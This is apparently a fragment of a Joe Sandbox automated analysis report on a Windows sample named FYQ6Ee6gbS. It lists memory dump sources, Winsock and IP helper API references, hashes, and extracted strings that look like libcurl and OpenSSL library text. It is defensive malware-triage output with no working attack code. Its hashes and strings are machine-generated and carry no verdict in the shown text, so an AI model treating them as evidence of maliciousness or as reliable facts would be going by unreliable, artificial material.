                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID: gethostname
                                          • String ID:
                                          • API String ID: 144339138-0
                                          • Opcode ID: 36dab5eaf5890b3cb40fdd60d642d27a0277d75cdcdc66727ef01f900bf1180f
                                          • Instruction ID: 48d9f8617f76922405f49f620f435867158c77a0a66dbd8dd1aff8a6119a7c60
                                          • Opcode Fuzzy Hash: 36dab5eaf5890b3cb40fdd60d642d27a0277d75cdcdc66727ef01f900bf1180f
                                          • Instruction Fuzzy Hash: F451D870A243028BEB30AF26DD5976376D4AF11319F18183FE98A867D1E775EC64CB42
                                          APIs
                                          • getsockname.WS2_32(?,?,00000080), ref: 002EAFD0
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID: getsockname
                                          • String ID:
                                          • API String ID: 3358416759-0
                                          • Opcode ID: db59bbda85d4ce0148fb8017b7000a062136626e9b9f20fcb18d9a048b318534
                                          • Instruction ID: 8b61635acee00d880675601e749458f3e034e56136a4e5cee5583a6796f8821e
                                          • Opcode Fuzzy Hash: db59bbda85d4ce0148fb8017b7000a062136626e9b9f20fcb18d9a048b318534
                                          • Instruction Fuzzy Hash: 961196708487C595EB268F1DD402BE6B3F4EFD0328F109618E59942550F7735AD68BC2
                                          APIs
                                          • send.WS2_32(?,?,?,00000000,00000000,?), ref: 002EA97F
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID: send
                                          • String ID:
                                          • API String ID: 2809346765-0
                                          • Opcode ID: 3c0ed815936d0ec2dd423e82c41a485cb2e06def073f894d534b1bdeefec6bf3
                                          • Instruction ID: 9d3dabc8daee711d8b7d07704cc5bc64d76c04f4e77be85d279623c127c5ab82
                                          • Opcode Fuzzy Hash: 3c0ed815936d0ec2dd423e82c41a485cb2e06def073f894d534b1bdeefec6bf3
                                          • Instruction Fuzzy Hash: D001A272B10711AFC6148F29D885B56B7A5EF84720F468659FA982B362C331BC108BE2
                                          APIs
                                          • socket.WS2_32(?,002EB280,00000000,-00000001,00000000,002EB280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 002EAF66
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID: socket
                                          • String ID:
                                          • API String ID: 98920635-0
                                          • Opcode ID: d6e8f02efc2e3446bf4967db33c2e429c93d3c574ae2dfdbbbdc5cd7c0646026
                                          • Instruction ID: 34d08888e768cfc372f03fd5362e887ce47cf5ca8447acb05a0a06af18f0b8e9
                                          • Opcode Fuzzy Hash: d6e8f02efc2e3446bf4967db33c2e429c93d3c574ae2dfdbbbdc5cd7c0646026
                                          • Instruction Fuzzy Hash: 5EE0EDB2A152216BD6649F5CE8449ABF3A9EFC4B20F454A49BC5463304C730BC518BE2
                                          APIs
                                          • closesocket.WS2_32(?,002E9422,?,?,?,?,?,?,?,?,?,?,?,w3-,006CD900,00000000), ref: 002EB04D
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID: closesocket
                                          • String ID:
                                          • API String ID: 2781271927-0
                                          • Opcode ID: 865fdd0ca95480b5bfb52102045ae8ccb969ffbc3e94de8ffdecf4cee9b37125
                                          • Instruction ID: d76a56afde7d03c8dda458fdc371f801947892b131fe448f06ec561c9eb0d873
                                          • Opcode Fuzzy Hash: 865fdd0ca95480b5bfb52102045ae8ccb969ffbc3e94de8ffdecf4cee9b37125
                                          • Instruction Fuzzy Hash: A9D0C23430020257CA208E15C884A57726B7FC0310FE8CB6CE02C8A160C73BEC538601
                                          APIs
                                          • ioctlsocket.WS2_32(?,8004667E,?,?,0025AF56,?,00000001), ref: 002867FC
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID: ioctlsocket
                                          • String ID:
                                          • API String ID: 3577187118-0
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1590210640.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_6ed0000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                          • API String ID: 0-1371176463
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8Br$Apr$Aug$Dec$Feb$Jan$Jul$Jun$Mar$May$Nov$Oct$Sep$Br
                                          • API String ID: 0-3771086639
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                          • API String ID: 0-122532811
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: attempts$buffered=%zu, left=%lld)$ndot$out$retr$retr$rota$time$use-$usev
                                          • API String ID: 0-1307463850
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                                          • API String ID: 0-1914377741
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %2lld.%0lldG$%2lld.%0lldM$%4lldG$%4lldM$%4lldP$%4lldT$%4lldk$%5lld
                                          • API String ID: 0-3476178709
                                          • Opcode ID: ee4ae5d9e112b95cc18f18e3ff1d69198d66630c9115d783f6a7181deaf8e061
                                          • Instruction ID: c1294b3925cbcff14de632119208fba658f2587ed4f45936a674e0b64ecf7e95
                                          • Opcode Fuzzy Hash: ee4ae5d9e112b95cc18f18e3ff1d69198d66630c9115d783f6a7181deaf8e061
                                          • Instruction Fuzzy Hash: F531A7E2774AA97AF7281409EC46F3E105FC3C5F10E7A823EB50A9B6C2D8F99D144165
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: !$EVP_DecryptFinal_ex$EVP_DecryptUpdate$EVP_EncryptFinal_ex$assertion failed: b <= sizeof(ctx->buf)$assertion failed: b <= sizeof(ctx->final)$crypto/evp/evp_enc.c
                                          • API String ID: 0-2550110336
                                          • Opcode ID: f0ef5b47fb661dc36189f5badf38450431ad7a8fd8109b58e7a78d27b0fbf577
                                          • Instruction ID: 845d51b757564685d35d322d9f4b04583f3c72799e7013595642af5beeabd719
                                          • Opcode Fuzzy Hash: f0ef5b47fb661dc36189f5badf38450431ad7a8fd8109b58e7a78d27b0fbf577
                                          • Instruction Fuzzy Hash: C1327B71748395BBDB26AB22AC43F3A77A5AF80704F144B2DF9446A3C2E7B4D950C742
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $.$;$?$?$xn--$xn--
                                          • API String ID: 0-543057197
                                          • Opcode ID: 0a586dd0487f56295c770db232ad54474f57cc3996739f88de18e70a202594a6
                                          • Instruction ID: f1fffa86e8bf06e1d6d67f4627c47f65ba5e0b1e7ee6b0de9cb7039245214825
                                          • Opcode Fuzzy Hash: 0a586dd0487f56295c770db232ad54474f57cc3996739f88de18e70a202594a6
                                          • Instruction Fuzzy Hash: E7223572A643829BEB509E25DD81B7BB7D8AF90348F84443CF94993292F770D924CB52
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                          • API String ID: 0-2555271450
                                          • Opcode ID: 5ba019c7a036300a68ec776461216345e17e27e726770597e9826d665e753fec
                                          • Instruction ID: 3f7458debf9878c55c8b92947eaa5477df4217e95e93058b7f710da0410037a4
                                          • Opcode Fuzzy Hash: 5ba019c7a036300a68ec776461216345e17e27e726770597e9826d665e753fec
                                          • Instruction Fuzzy Hash: 8EC2DC31A18322AFC715CF68D49076AB7E2FFC8314F158A2DE8999B351D770EC558B82
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                          • API String ID: 0-2555271450
                                          • Opcode ID: b27e7dbeceee738bc85f9c2619eb31d9cf9d16794b38a9a89836bd573eae3e18
                                          • Instruction ID: e0a1b60a6e5424ff87f6a36869407a90bdd0476a4afb74ec50183f7e39a31a24
                                          • Opcode Fuzzy Hash: b27e7dbeceee738bc85f9c2619eb31d9cf9d16794b38a9a89836bd573eae3e18
                                          • Instruction Fuzzy Hash: CF820171A18312AFDB14CE68D98072BBBE1AFC5324F158A3CF8A997291D770DC15CB52
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: default$login$macdef$machine$netrc.c$password
                                          • API String ID: 0-1043775505
                                          • Opcode ID: 2eb9f7b2a71bd634861ddc41f5a0a2f56cb72631dcba3eddffe32de05048bfc0
                                          • Instruction ID: a96eb01b7abe3f82b354b012e9967c7af92b2b59639317e332c15edde4f12147
                                          • Opcode Fuzzy Hash: 2eb9f7b2a71bd634861ddc41f5a0a2f56cb72631dcba3eddffe32de05048bfc0
                                          • Instruction Fuzzy Hash: 68E15D7852D3929BE310AF10984D72BBBD4AF85709F54046CFCC5572C2E3B9D968CB92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ????$Invalid input packet$SMB upload needs to know the size up front$\$\\
                                          • API String ID: 0-4201740241
                                          • Opcode ID: af2440417449cd50610c3f1f8c54f150cc80625c57c0752041493f0ab962ebb6
                                          • Instruction ID: 22ecd2cc0a48e65ff828d89b888555602246579f913a41da239cbb9b9d84f60f
                                          • Opcode Fuzzy Hash: af2440417449cd50610c3f1f8c54f150cc80625c57c0752041493f0ab962ebb6
                                          • Instruction Fuzzy Hash: EF6215B4924741DBD714DF20C4907AAB7E4FF98304F04951EE88D8B392E774EAA4CB96
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .DAFSA@PSL_$===BEGIN ICANN DOMAINS===$===BEGIN PRIVATE DOMAINS===$===END ICANN DOMAINS===$===END PRIVATE DOMAINS===
                                          • API String ID: 0-2839762339
                                          • Opcode ID: 94966bb8c90cee948e4123239745863b479b11bb176879ddca635fc7db7207a1
                                          • Instruction ID: c704f946114e6c2997fd06c0c13e52145fd80f68aeb09a4b535805b3c1203b17
                                          • Opcode Fuzzy Hash: 94966bb8c90cee948e4123239745863b479b11bb176879ddca635fc7db7207a1
                                          • Instruction Fuzzy Hash: 8B02E7B1A053419FD7249F24D845B6FBFD5BF92344F08882DF98987242EB71E914CBA2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $d$nil)
                                          • API String ID: 0-394766432
                                          • Opcode ID: 2e4fbd0fe1c3f0f08cff88bf9ce13970066cc2ba8d35f5bf8d806f44d196053b
                                          • Instruction ID: 06baaf6ffde9d9ff198b717fdca65a4e26e8469a2ca347a4a8715ff65cd1fb6b
                                          • Opcode Fuzzy Hash: 2e4fbd0fe1c3f0f08cff88bf9ce13970066cc2ba8d35f5bf8d806f44d196053b
                                          • Instruction Fuzzy Hash: F31333706083428FD720DF28C08566EBBE1BFCA354F244A2DE9959B3A1D771ED45CB92
                                          APIs
                                          • GetUnicastIpAddressTable.IPHLPAPI(?,?), ref: 002E8FE6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID: AddressTableUnicast
                                          • String ID: 127.0.0.1$::1
                                          • API String ID: 2844252683-3302937015
                                          • Opcode ID: 4a1908b714b1325618ecdb671a74a01a1c753216aa72c7aba3e8475c98475645
                                          • Instruction ID: 2ce437dd798834e4ed49e12944e3eb4bd64c68a94c15d20f7e7387c8abd74029
                                          • Opcode Fuzzy Hash: 4a1908b714b1325618ecdb671a74a01a1c753216aa72c7aba3e8475c98475645
                                          • Instruction Fuzzy Hash: 14A1F5B1C643829BE710DF25C845726B7E0BF95304F55962AF8488B252F7B1EDE0C792
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                           • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 0123456789$0123456789ABCDEF$0123456789abcdef$:
                                          • API String ID: 0-3285806060
                                          • Opcode ID: 99d290621a9f1ea4ad0a3c3d0ef848e5caf4bcc45d9198f1050b3195f45ee3ce
                                          • Instruction ID: 3e55663311d8daaa3109757afb0f3e6dcea5fe6cc7ae112eef572c20f97b1fec
                                          • Opcode Fuzzy Hash: 99d290621a9f1ea4ad0a3c3d0ef848e5caf4bcc45d9198f1050b3195f45ee3ce
                                          • Instruction Fuzzy Hash: A1D1F772A283038BD7249E28CD4137ABBD1AF95304F24493FE8D997385DB749DA4D782
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                           • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
